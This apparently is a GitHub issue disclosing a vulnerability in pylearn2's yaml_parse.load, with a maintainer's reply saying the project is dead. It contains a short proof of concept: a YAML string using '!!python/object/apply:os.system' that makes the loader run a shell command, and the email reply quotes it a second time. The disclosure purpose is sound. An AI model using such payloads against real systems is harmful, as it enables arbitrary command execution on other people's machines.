yaml_parse.load method is vulnerable

[bigbigliang-malwarebenchmark]

import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)

Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.

[nouiz]

This project is dead. I do not think someone will update it unless you do a PR. Thanks for the report. It is useful to raise awareness of such type of problem. Le lun. 10 déc. 2018 20:34, bigbigliang-malwarebenchmark < notifications@github.com> a écrit :

…

import pylearn2.config.yaml_parse test_str ='!!python/object/apply:os.system ["ls"]' test_load = pylearn2.config.yaml_parse.load(test_str) Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution. — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#1593>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AALC-0i20n1Cfrn7-xI2ooAmu22K17Lwks5u3wuzgaJpZM4ZMf85> .